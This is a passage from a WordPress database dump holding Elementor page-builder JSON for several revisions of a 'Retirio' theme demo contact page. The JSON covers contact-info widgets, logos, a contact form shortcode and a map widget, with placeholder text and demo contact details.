con_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"849b928\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-letter\",\"library\":\"ovaicon\"},\"label\":\"Write email\",\"items_info\":[{\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"9baa065\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-pin\",\"library\":\"ovaicon\"},\"label\":\"Visit anytime \",\"items_info\":[{\"type\":\"link\",\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\",\"link_label\":\"BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/aDtccje1G7M53R3E8\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false},{\"id\":\"3e7e3bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":42,\"_inline_size_tablet\":100,\"align\":\"center\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg.png\",\"id\":800,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"top right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9fb7201\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"logo_opacity_desktop\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"logo_opacity_mobile\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"ova_logo\"},{\"id\":\"62a6664\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us \",\"title\":\"Write anytime\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"color_title\":\"#FFFFFF\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"21ccb5c\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"44\",\"left\":\"0\",\"isLinked\":false},\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\",\"shortcode\":\"[contact-form-7 id=\\\"884\\\" title=\\\"Contact page\\\"]\",\"_css_classes\":\"ova-contact-page\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0ec9a68\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\"},\"elements\":[{\"id\":\"fc5198b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080f03e\",\"elType\":\"widget\",\"settings\":{\"address\":\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"height\":{\"unit\":\"px\",\"size\":475,\"sizes\":[]},\"height_tablet\":{\"unit\":\"px\",\"size\":350,\"sizes\":[]},\"css_filters_css_filter\":\"custom\",\"css_filters_brightness\":{\"unit\":\"px\",\"size\":93,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":107,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"zoom\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"hover_transition\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"google_maps\"}],\"isInner\":false}],\"isInner\":false}]'),(2879,4722,'_elementor_page_assets','a:0:{}'),(2880,40,'_elementor_pro_version','3.8.1'),(2881,4723,'_wp_page_template','elementor_header_footer'),(2882,4723,'_elementor_edit_mode','builder'),(2883,4723,'_elementor_template_type','wp-page'),(2884,4723,'_elementor_version','3.8.1'),(2885,4723,'_elementor_data','[{\"id\":\"cf0a9af\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-60\",\"left\":0,\"isLinked\":false},\"z_index\":5},\"elements\":[{\"id\":\"11277b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":57.332,\"_inline_size_tablet\":100,\"_inline_size_mobile\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"80\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"25d4298\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us\",\"title\":\"Feel free to get in touch with retirio\",\"description\":\"Aliquam hendrerit a augue insuscipit. Etiam aliquam massa quis des mauris commodo venenatis ligula commodo leez sed blandit convallis dignissim onec vel pellentesque neque.\\n\\n\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"2fd982e\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-phone-call\",\"library\":\"ovaicon\"},\"label\":\"Have any question?\",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"849b928\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-letter\",\"library\":\"ovaicon\"},\"label\":\"Write email\",\"items_info\":[{\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"9baa065\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-pin\",\"library\":\"ovaicon\"},\"label\":\"Visit anytime \",\"items_info\":[{\"type\":\"link\",\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\",\"link_label\":\"BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/aDtccje1G7M53R3E8\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false},{\"id\":\"3e7e3bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":42,\"_inline_size_tablet\":100,\"align\":\"center\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg.png\",\"id\":800,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"top right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9fb7201\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"logo_opacity_desktop\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"logo_opacity_mobile\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"ova_logo\"},{\"id\":\"62a6664\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us \",\"title\":\"Write anytime\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"color_title\":\"#FFFFFF\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"21ccb5c\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"44\",\"left\":\"0\",\"isLinked\":false},\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\",\"shortcode\":\"[contact-form-7 id=\\\"884\\\" title=\\\"Contact page\\\"]\",\"_css_classes\":\"ova-contact-page\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0ec9a68\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\"},\"elements\":[{\"id\":\"fc5198b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080f03e\",\"elType\":\"widget\",\"settings\":{\"address\":\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"height\":{\"unit\":\"px\",\"size\":475,\"sizes\":[]},\"height_tablet\":{\"unit\":\"px\",\"size\":350,\"sizes\":[]},\"css_filters_css_filter\":\"custom\",\"css_filters_brightness\":{\"unit\":\"px\",\"size\":93,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":107,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"zoom\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"hover_transition\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"google_maps\"}],\"isInner\":false}],\"isInner\":false}]'),(2886,4723,'_elementor_page_assets','a:0:{}'),(2887,4723,'_elementor_pro_version','3.8.1'),(2888,4724,'_wp_page_template','elementor_header_footer'),(2889,4724,'_elementor_edit_mode','builder'),(2890,4724,'_elementor_template_type','wp-page'),(2891,4724,'_elementor_version','3.8.1'),(2892,4724,'_elementor_data','[{\"id\":\"cf0a9af\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-60\",\"left\":0,\"isLinked\":false},\"z_index\":5},\"elements\":[{\"id\":\"11277b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":57.332,\"_inline_size_tablet\":100,\"_inline_size_mobile\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"80\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"25d4298\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us\",\"title\":\"Feel free to get in touch with retirio\",\"description\":\"Aliquam hendrerit a augue insuscipit. Etiam aliquam massa quis des mauris commodo venenatis ligula commodo leez sed blandit convallis dignissim onec vel pellentesque neque.\\n\\n\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"2fd982e\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-phone-call\",\"library\":\"ovaicon\"},\"label\":\"Have any question?\",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"849b928\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-letter\",\"library\":\"ovaicon\"},\"label\":\"Write email\",\"items_info\":[{\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"9baa065\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-pin\",\"library\":\"ovaicon\"},\"label\":\"Visit anytime \",\"items_info\":[{\"type\":\"link\",\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\",\"link_label\":\"BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/aDtccje1G7M53R3E8\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false},{\"id\":\"3e7e3bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":42,\"_inline_size_tablet\":100,\"align\":\"center\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg.png\",\"id\":800,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"top 